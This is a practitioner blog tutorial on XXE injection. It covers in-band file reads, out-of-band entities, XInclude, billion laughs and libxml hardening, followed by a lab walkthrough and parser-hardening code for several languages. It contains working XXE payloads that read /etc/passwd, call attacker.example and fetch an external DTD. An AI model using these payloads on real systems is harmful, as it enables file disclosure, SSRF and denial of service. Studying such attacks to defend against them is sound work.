TechEarl

XML External Entity (XXE): The Complete 2026 Practitioner Guide

XXE deep dive: in-band file reads, out-of-band exfiltration via external entities, XInclude, billion-laughs DoS, and what libxml 2.9.x's hardening actually changed in 2026.

Ishan Karunaratne
[Figure: XML external entity attack diagram showing file disclosure]

XML External Entity injection is the vulnerability that defined an OWASP Top 10 slot in 2017, then quietly vanished from the next edition because the parsers got fixed. That second half is half true. libxml flipped external-entity loading off by default back in 2012, the rest of the major parsers followed across the next few years, and the textbook out-of-band exfil chain that every penetration-test report used to feature does not fire end-to-end on a modern PHP 8.2 install. The out-of-band primitive itself still works. XInclude is still a separate bypass that audits routinely miss. Legacy applications still ship with the unsafe flags re-enabled because someone copied a Stack Overflow snippet in 2014. This article is the field-tested, parser-version-honest version of the XXE story.

This is the spoke companion to the web application security vulnerabilities taxonomy. I cover what XXE is, the four attack flavours, what libxml 2.9.x actually changed (with the dates), a working walk-through against a Dockerised lab that proves which patterns still fire and which do not, the equivalents in Java, .NET, Python, and Go, the modern defences, and a handful of verified CVEs.

What is XXE?

XML External Entity injection is what happens when an XML parser is asked to parse attacker-controlled XML with external-entity resolution turned on. The attacker declares a custom entity inside the document's DOCTYPE whose value is a SYSTEM URI, the parser dereferences that URI as part of building the parse tree, and the result of the dereference (file contents, the body of an HTTP response, the output of a network probe) gets substituted into the document wherever the entity is referenced.

It is catalogued as CWE-611, Improper Restriction of XML External Entity Reference. It used to sit at A04 in the OWASP Top 10 2017. In the 2021 edition it was folded into A05 Security Misconfiguration, on the reasoning that the parsers ship safe and the remaining incidents are almost always a deliberate config flag set wrong rather than a fresh bug.

The mechanism rides on three XML features that are easy to forget exist:

  1. DTDs (Document Type Definitions). A <!DOCTYPE> block inside an XML document can declare entities, including external ones, that are then expanded as the document is parsed.
  2. General entities. <!ENTITY foo SYSTEM "file:///etc/passwd"> declares an entity named foo whose expansion is the contents of /etc/passwd. Referencing it as &foo; in the document body substitutes the file content at that point.
  3. Parameter entities. <!ENTITY % foo SYSTEM "..."> is the variant used inside the DTD itself, expanded with %foo;. They are the building block for the classic blind exfil chain.

XML, in other words, is a small programming language. If you forget that and you hand attacker input to a parser configured to evaluate it, you get the predictable result.
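
To make the "small programming language" point concrete, here is a minimal sketch using Python's standard-library xml.etree.ElementTree. The document and the entity name greet are made up for illustration. It only uses an internal entity, so nothing is fetched, but it shows that the substitution happens inside the parser before application code sees anything.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: an internal general entity declared in the DOCTYPE.
DOC = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY greet "hello from the DTD">
]>
<note>&greet;</note>"""

root = ET.fromstring(DOC)

# The application never sees "&greet;", only the text the parser substituted.
print(root.text)
```

The same substitution step is what an external entity abuses: swap the quoted literal for a SYSTEM URI and, on a parser that resolves it, the substituted text is whatever that URI returned.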

The four attack flavours

Classic in-band XXE: file read reflected in the response

The simplest case. The application accepts XML, parses it with external entities enabled, and then reflects some parsed value back in its HTTP response. The attacker declares an entity that reads a local file and references it in a field that gets reflected.

xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<bookmarks>
  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>

The parser substitutes &xxe; with the bytes of /etc/passwd while building the tree. The application, none the wiser, walks the tree and echoes <name> into HTML. The full file lands in the response.

This pattern requires the application to actually surface parsed content back to the user, which is more common than you would think: any importer that says "imported these 12 records, here they are" is a candidate.
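
The reflecting sink itself is usually a few unremarkable lines. The sketch below is a hypothetical importer, not the code of any real application: render_import and its HTML shape are assumptions. Python's standard-library ElementTree refuses external entities, so an internal entity stands in for the bytes a SYSTEM entity would have pulled in on an unsafe parser.

```python
import html
import xml.etree.ElementTree as ET

def render_import(xml_text: str) -> str:
    """Parse a bookmarks document and echo every <name> back as HTML."""
    root = ET.fromstring(xml_text)
    names = [el.text or "" for el in root.iter("name")]
    items = "".join(f"<li><strong>{html.escape(n)}</strong></li>" for n in names)
    return f"<p>Imported {len(names)} record(s)</p><ul>{items}</ul>"

# Internal entity standing in for what file:///etc/passwd would have supplied.
PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe "root:x:0:0:root:/root:/bin/bash">]>
<bookmarks>
  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>"""

print(render_import(PAYLOAD))
```

Output escaping does not help here. The importer escapes correctly and still discloses the content, because by the time it runs the entity is already ordinary text in the tree.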

Out-of-band HTTP exfil: direct external entity

Same shape, but the attacker does not need reflection. The SYSTEM URI is an HTTP URL pointing at an attacker-controlled server. When the parser resolves the entity, libxml issues an outbound HTTP request to that URL. The attacker reads the request out of their access log.

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://attacker.example/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

This is the version of OOB that still works on current libxml. The application response can be a flat OK; the parser still reaches out. The trade-off is that the attacker only proves the primitive fires and does not directly exfiltrate file contents this way. To carry /etc/passwd in a follow-up HTTP request, the exfil URL would have to embed the expansion of a second entity, and XML does not expand entity references inside an entity's SYSTEM identifier. Building a URL out of another entity's value takes parameter entities in an external DTD, which is the chain covered later in this article.

Direct OOB is enough to turn a server into an SSRF gadget against internal-only HTTP services and, in some libxml builds, a wide range of other URI schemes.

XInclude: an entirely separate path

XInclude is a W3C specification (XML Inclusions) that lets one XML document include the parsed content of another through a dedicated element rather than through entity resolution. It uses a separate libxml entry point (xmlXIncludeProcess in C, $dom->xinclude() in PHP) and a separate set of flags. Code that has carefully disabled DTD loading and external entities can still be vulnerable if it also calls the XInclude processor on attacker-controlled XML.

xml
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
  <bookmark>
    <name><xi:include href="file:///etc/hostname" parse="text"/></name>
    <url>http://x</url>
  </bookmark>
</bookmarks>

No DOCTYPE, no <!ENTITY>. An audit that grepped for <!ENTITY would miss this. The fix is "do not call the XInclude processor on untrusted input", which sounds obvious until you find it in a legacy XSLT pipeline.
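
An audit that also wants to catch this path has to look for elements in the XInclude namespace rather than for DTD syntax. The following is a minimal sketch with the standard library; find_xincludes is a hypothetical helper name, and the second namespace is included on the assumption that some processors also accept the draft-era URI.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NAMESPACES = (
    "http://www.w3.org/2001/XInclude",  # namespace used in the payload above
    "http://www.w3.org/2003/XInclude",  # draft-era URI, assumed to be accepted by some processors
)

def find_xincludes(xml_text: str) -> list:
    """Return the href of every XInclude include element in the document."""
    root = ET.fromstring(xml_text)  # ElementTree parses xi:include as a plain element
    hrefs = []
    for ns in XINCLUDE_NAMESPACES:
        # Matching on the namespace URI works whatever prefix the sender chose.
        for el in root.iter(f"{{{ns}}}include"):
            hrefs.append(el.get("href", ""))
    return hrefs

PAYLOAD = """<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
  <bookmark>
    <name><xi:include href="file:///etc/hostname" parse="text"/></name>
    <url>http://x</url>
  </bookmark>
</bookmarks>"""

print(find_xincludes(PAYLOAD))
```

Matching on the namespace rather than on the literal string xi:include matters because the prefix is attacker-chosen.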

Billion laughs: entity-expansion DoS

The original "XML bomb". A nested chain of general entities that, when fully expanded, balloons a few hundred bytes of input into gigabytes of output, exhausting memory before the parse completes.

xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol6 "...">
]>
<root>&lol6;</root>

libxml has mitigated this by default for years through a hard entity-expansion ceiling: the parser refuses to expand a document past a fixed substitution limit and aborts with a diagnostic instead. The mitigation can be turned off (passing LIBXML_PARSEHUGE in PHP, XML_PARSE_HUGE in C). If you cannot find a reason your code needs LIBXML_PARSEHUGE, you do not need it.
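
The amplification is easy to work out by hand: with a fan-out of ten, each level multiplies the expanded size by ten. The sketch below follows the lol, lol2, lol3 naming of the payload above; build_bomb and expanded_bytes are hypothetical helper names. Only a harmless three-level document is actually parsed, to confirm the arithmetic.

```python
import xml.etree.ElementTree as ET

def expanded_bytes(levels: int, fanout: int = 10, base: str = "lol") -> int:
    """Size of the top-level entity once fully expanded."""
    return len(base) * fanout ** (levels - 1)

def build_bomb(levels: int, fanout: int = 10, base: str = "lol") -> str:
    """Build a nested-entity document with entities lol, lol2, ..., lol<levels>."""
    decls = [f'  <!ENTITY lol "{base}">']
    prev = "lol"
    for n in range(2, levels + 1):
        refs = f"&{prev};" * fanout  # each level references the previous one `fanout` times
        decls.append(f'  <!ENTITY lol{n} "{refs}">')
        prev = f"lol{n}"
    body = "\n".join(decls)
    return f'<?xml version="1.0"?>\n<!DOCTYPE lolz [\n{body}\n]>\n<root>&{prev};</root>'

# Parse only the tiny three-level case to check the formula against a real parser.
small = ET.fromstring(build_bomb(3))
print(len(small.text), expanded_bytes(3))

# For larger depths, compare input size with expanded size without parsing anything.
for levels in (6, 10):
    print(levels, len(build_bomb(levels)), expanded_bytes(levels))
```

A ten-level document is under a kilobyte on the wire and expands to three billion bytes, which is why the ceiling has to live in the parser and not in a request-size limit.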

What libxml 2.9.x actually changed

This is the part most XXE write-ups handwave, and it matters, because the version of the parser is the difference between "textbook OOB file exfil works in five minutes" and "the only thing that fires is the direct entity probe".

libxml2 2.9.0 shipped on 2012-09-11. The headline change for this article is that external-entity loading is off by default: a fresh xmlReadFile call will not dereference a SYSTEM URI unless the caller explicitly opts in with XML_PARSE_NOENT (or, in PHP, passes LIBXML_NOENT to loadXML). Every textbook XXE payload from before 2013 assumed external entities loaded by default. After 2.9.0 they did not.

libxml2 2.9.4 (2016) and the subsequent 2.9.10 / 2.9.11 / 2.9.12 / 2.9.13 / 2.9.14 line tightened parameter-entity processing further: the parser refuses to expand a parameter-entity declaration loaded from an external DTD if that declaration in turn introduces a new entity whose body needs to resolve another parameter-entity reference. Concretely, the classic "load evil.dtd containing recursive %file + %eval + %exfil definitions, force %exfil; to fire so the file contents land in a second outbound HTTP request" chain no longer fires end to end.

I confirmed this against PHP 8.2 linked to libxml2 2.9.14 (Debian bookworm package) in the companion lab below. The DTD itself loads (the collaborator container logs GET /evil.dtd). The second-stage %exfil; GET that was supposed to carry the file contents in its query string never lands. The OOB primitive is intact; the OOB-file-content-exfil chain is mostly historical.

The take-away is not "XXE is fixed". It is:

  • On a modern libxml, you need either an application that explicitly re-enables external entities (legacy code, "we need DTDs for our SOAP client", LIBXML_NOENT | LIBXML_DTDLOAD) or a different code path entirely (XInclude).
  • When you do find such an application, classic in-band reflection still works for file reads, direct OOB still proves egress and gives you SSRF, XInclude still pulls files.
  • The PortSwigger / OWASP write-ups that show file-content exfil through a recursive parameter-entity chain are correct against older parsers and against parsers built with different flags. They are not correct against PHP 8.2 with stock libxml. Test against the actual parser the target runs.
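
"Test against the actual parser" starts with knowing its version. For a Python target that uses lxml, the linked libxml2 version is exposed as etree.LIBXML_VERSION; PHP exposes the same information through its LIBXML_DOTTED_VERSION constant. The sketch below is a hedged illustration: both helper names are hypothetical, and the second function encodes only the 2.9.0 default change described above, nothing about the later parameter-entity hardening.

```python
from typing import Optional, Tuple

def linked_libxml_version() -> Optional[Tuple[int, ...]]:
    """Return the libxml2 version lxml runs against, or None if lxml is absent."""
    try:
        from lxml import etree  # third-party; assumed to be what the target uses
    except ImportError:
        return None
    return tuple(etree.LIBXML_VERSION)

def external_entities_on_by_default(version: Tuple[int, ...]) -> bool:
    """Per the 2.9.0 change: external-entity loading is off by default from 2.9.0."""
    return tuple(version) < (2, 9, 0)

version = linked_libxml_version()
if version is None:
    print("lxml not installed; check the parser the target actually links")
else:
    print(version, "external entities on by default:",
          external_entities_on_by_default(version))
```

The version only describes the defaults. An application that passes the unsafe flags is exposed on any version, so the flag audit still has to happen.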

Walk a working chain: the xxe-basic lab

The techearl-labs repo ships an xxe-basic lab that mirrors the four flavours above. The parser is configured with LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, which is the unsafe combination: external entities are substituted and the inline DOCTYPE is allowed to dereference SYSTEM URIs. XInclude is opted into separately, through an explicit $dom->xinclude() call. The entity-expansion limit is left on, deliberately, so the lab can demonstrate the default mitigation working.

Bring it up:

bash
docker compose up xxe-basic

Two endpoints:

  • POST /import.php reflects every <name> element back in the HTML response. In-band XXE and XInclude land here.
  • POST /upload-blind.php returns a flat OK / Error. Blind / OOB scenarios land here.

Every scenario uses the same curl shape:

bash
curl -s -X POST --data-binary @payload.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php

Scenario 1: in-band file read

Save the classic in-band payload from earlier in this article to payload.xml and POST it to /import.php. The response includes a bookmark whose <strong> is the full /etc/passwd text from the container.

Scenario 2: direct OOB via external entity (this fires on libxml 2.9.14)

This is the variant that proves the OOB primitive still works. Send the payload to /upload-blind.php:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

Tail the collaborator in a second terminal:

bash
docker compose logs -f xxe-basic-collab

You will see a line of the shape [collab] GET from <ip> path=/?leak=fired. The application response is just OK. The parser issued the outbound HTTP request anyway. This is the real, fires-today primitive.
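
A collaborator does not need to be more than a web server that writes down what it was asked for. The following is a minimal standard-library sketch of that idea. It is not the lab's actual collaborator code; the Collab class, the hits list, and the loopback request that stands in for the parser's outbound fetch are all assumptions made for illustration.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

hits = []  # every requested path, in arrival order

class Collab(BaseHTTPRequestHandler):
    def do_GET(self):
        hits.append(self.path)
        print(f"[collab] GET from {self.client_address[0]} path={self.path}")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, fmt, *args):
        pass  # silence the default stderr access log

def start_collab(port: int = 0) -> HTTPServer:
    """Start the listener on loopback; port 0 lets the OS pick a free port."""
    server = HTTPServer(("127.0.0.1", port), Collab)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

server = start_collab()
port = server.server_address[1]

# Stand-in for the parser dereferencing the SYSTEM URI.
conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
conn.request("GET", "/?leak=fired")
conn.getresponse().read()
conn.close()

server.shutdown()
server.server_close()
print(hits)
```

The point of the query string is correlation: a unique marker per payload tells you which injection point fired when several are in flight.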

Scenario 3: the textbook recursive parameter-entity chain (does not fire end to end on this libxml)

The lab also ships an evil.dtd and the payload that points at it:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<bookmarks>
  <bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>

POST to /upload-blind.php. The collaborator logs GET /evil.dtd, proving the parser fetched the external DTD. The second-stage exfil GET that the DTD tries to trigger never lands. This is the libxml 2.9.x hardening at work. I am including this scenario in the article because it is what every other XXE tutorial demonstrates and it is the single most important version-sensitive footgun: the pattern works against older parsers (and against parsers explicitly built with the hardening disabled) and produces a clean negative against modern ones, which makes "we tested XXE and nothing happened" hard to interpret without knowing the parser version.

Scenario 4: billion laughs (default-mitigated)

POST the nested-entity payload to /import.php. libxml's entity-expansion ceiling refuses to expand the document and the endpoint returns an XML parse error. Container CPU and memory stay flat. This is the right answer: the attack is documented, the mitigation that already blocks it is also documented.

Scenario 5: XInclude file read

POST the XInclude payload to /import.php. The application explicitly calls $dom->xinclude() on the parsed document, the include is expanded in place, and the container's /etc/hostname lands in the response. No DOCTYPE, no entity declaration. An audit looking only for <!ENTITY in source code or in incoming XML would miss this entirely.

XXE in other parsers

The libxml story is the most-documented because PHP, Perl, Ruby's Nokogiri, and most of the Python C-extension XML parsers wrap it. The other major XML stacks have their own histories and their own safe-default flags.

Java

Historically the worst offender. DocumentBuilderFactory, SAXParserFactory, XMLInputFactory, and TransformerFactory all default to "evaluate everything", and the safe configuration has to be applied per factory:

java
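import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;

// setFeature can throw ParserConfigurationException; let it propagate
// so a factory that cannot be hardened is never used.
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
// Rejecting any DOCTYPE is the strongest single setting; the rest are defence in depth.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);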

The OWASP XXE Prevention Cheat Sheet has the full list per factory. Newer Java releases have raised the default secure-processing baseline, but the long tail of Java XML code in production was written when the defaults were unsafe.

.NET

XmlDocument.XmlResolver has been null by default since .NET Framework 4.5.2 (released 2014), which kills entity resolution. XmlReaderSettings controls the modern path:

csharp
using System.Xml;

var settings = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Prohibit, // any DOCTYPE throws XmlException
    XmlResolver = null                      // nothing external is ever fetched
};
using var reader = XmlReader.Create(input, settings);

DtdProcessing.Prohibit is the right default for parsing arbitrary input. DtdProcessing.Parse plus a null resolver is the right setting if you genuinely need DTD-defined entities but no external dereferencing. DtdProcessing.Parse plus a non-null resolver is the unsafe combination.

Python

The standard library xml.etree.ElementTree has been safe against external entities by default for years: it does not resolve them, and it raises a ParseError when a document references one. Internal entities declared in the DOCTYPE are still expanded. The modules that have historically needed more care are xml.dom.minidom, xml.sax, and the third-party lxml (which wraps libxml). The Python security docs recommend defusedxml for any code that has to parse untrusted XML. It wraps every standard-library parser and, by default, raises on entity declarations and external references; passing forbid_dtd=True makes it reject any DOCTYPE as well:

python
from defusedxml.ElementTree import fromstring
tree = fromstring(untrusted_xml)

For lxml specifically:

python
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.fromstring(untrusted_xml, parser)
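
The standard-library behaviour is quick to confirm for yourself. This is a minimal sketch; parses_cleanly is a hypothetical helper name, and the exact error text is whatever the underlying expat build reports.

```python
import xml.etree.ElementTree as ET

EXTERNAL = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<foo>&xxe;</foo>"""

def parses_cleanly(xml_text: str) -> bool:
    """Return True if ElementTree accepts the document, False if it raises."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError as exc:
        print("rejected:", exc)
        return False
    return True

print(parses_cleanly(EXTERNAL))          # external entity reference
print(parses_cleanly("<foo>ok</foo>"))   # plain document
```

Run the same two documents through whatever parser and flags your application really uses. A parser that accepts the first one and returns the file content is the finding.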

Go

encoding/xml does not support DTDs or external entities at all. It is the safest XML parser of the major languages, by design. The only XXE-shaped risks in a Go codebase come from binding a third-party C XML library, or from running an XSLT pipeline that does support external resolution.

Modern defences

The defensive story for XXE is genuinely simple, in a way most vulnerability classes are not:

  1. Disable external entity resolution entirely. Almost no production application needs to dereference SYSTEM URIs while parsing user input. Set the right flags per parser and walk away. In PHP, the safe flags are "none of the unsafe ones": do not pass LIBXML_NOENT, do not pass LIBXML_DTDLOAD. The defaults are correct.
  2. Do not call XInclude on untrusted input. XInclude is opt-in; treat opt-in as a deliberate architectural decision and make sure the input has been schema-validated first.
  3. Prefer JSON for new APIs. JSON parsers do not have an entity-resolution layer at all. The class is closed off by construction. This is the realistic long-term answer for greenfield work, but it does not retire legacy XML endpoints in your existing codebase.
  4. Schema-validate XML inputs strictly. A strict XSD that rejects unexpected elements raises the cost of an XXE probe even if the parser is misconfigured. It is a defence-in-depth layer, not the fix.
  5. Network-egress restrictions on application hosts. The OOB primitive needs an outbound HTTP request from the application to the internet. A default-deny egress policy denies the primitive even when the parser config is wrong. This is the same advice that closes off the out-of-band tier in SQL injection (see the SQL injection deep dive) and SSRF.
  6. Keep libxml current. The hardening between 2.9.0 and 2.9.14 was incremental and significant. Old PHP and old Python installs that statically link an old libxml are the realistic targets, not fully-patched 2026 stacks.
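
Where no production input has a legitimate reason to carry a DOCTYPE, the first item can be enforced before the real parser ever runs. The sketch below does that with the standard-library expat bindings. It is an illustration of the idea, not a replacement for defusedxml, and DTDForbidden and assert_no_dtd are hypothetical names.

```python
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""

def assert_no_dtd(xml_bytes: bytes) -> None:
    """Raise DTDForbidden if the document declares a DOCTYPE; return None otherwise."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at the start of the DOCTYPE, before any entity declaration is read.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # malformed input raises expat.ExpatError

assert_no_dtd(b"<bookmarks><bookmark><name>x</name></bookmark></bookmarks>")

try:
    assert_no_dtd(b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
except DTDForbidden as exc:
    print("blocked:", exc)
```

A guard like this closes the entity paths only. It does nothing about XInclude, which carries no DOCTYPE, so the second item on the list still needs its own check.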

Real-world incidents

XXE has a credible CVE history across vendors and product categories. Three illustrative examples, with the caveat that you should always pull the exact affected versions from the vendor advisory or NVD entry before quoting them in production:

  • CVE-2019-3960 in Citrix ShareFile (StorageZones Controller). XXE in a file-handling endpoint, the kind of legacy SOAP-adjacent integration where unsafe parser defaults survive into 2019.
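  • CVE-2022-23307 in Chainsaw, the log viewer bundled with Apache Log4j 1.x, part of the long tail of CVEs filed against Log4j 1.x after the Log4Shell disclosure pulled the world's attention back to the abandoned 1.x branch. The advisory describes it as a deserialization flaw rather than CWE-611, so read it as an example of abandoned legacy components staying exploitable rather than as an XXE proper.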
  • The 2014 Facebook XXE reported by Reginaldo Silva. The interesting twist is that the finding was classified as a potential remote code execution rather than a plain file read and paid out at the top tier of the bug-bounty programme. It remains the canonical example of why an XXE finding should not be classified as "information disclosure" and closed at low severity. PHP's expect:// stream wrapper is the usually cited route from XXE to command execution on PHP targets. The escalation path is the lesson, the specific PHP wrapper less so.

The pattern across the CVE history: XXE rarely appears in newly-written code, frequently appears in legacy XML configuration parsers and SOAP / SAML endpoints, and is usually chained into SSRF or occasionally into RCE rather than ending at file disclosure. Modern Java middleware (Cisco, IBM, Oracle product lines) has had a steady drip of similar findings through 2018 to 2024 wherever a SOAP service was wired up before its XMLInputFactory had FEATURE_SECURE_PROCESSING enabled by default; rather than name specific CVE IDs from memory, the safer recommendation is to search the vendor's advisory database for "XXE" or "CWE-611" before assuming any product is safe.

Where to go next

The companion piece on the tooling that automates XXE discovery and exploitation is best XXE tools for 2026: the Burp Suite XML scanner, the XXEinjector toolkit, custom Python scripts using lxml or defusedxml to fuzz parser configurations. The hub page is the web application security vulnerabilities taxonomy. Sister spokes worth following from here: SQL injection for the other "untrusted input parsed as code" class, and the SSRF spoke (when published) for what an OOB primitive actually buys an attacker after the entity has resolved.

Tags: xxe, xml-external-entity, owasp-top-10, libxml, parser-security

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.
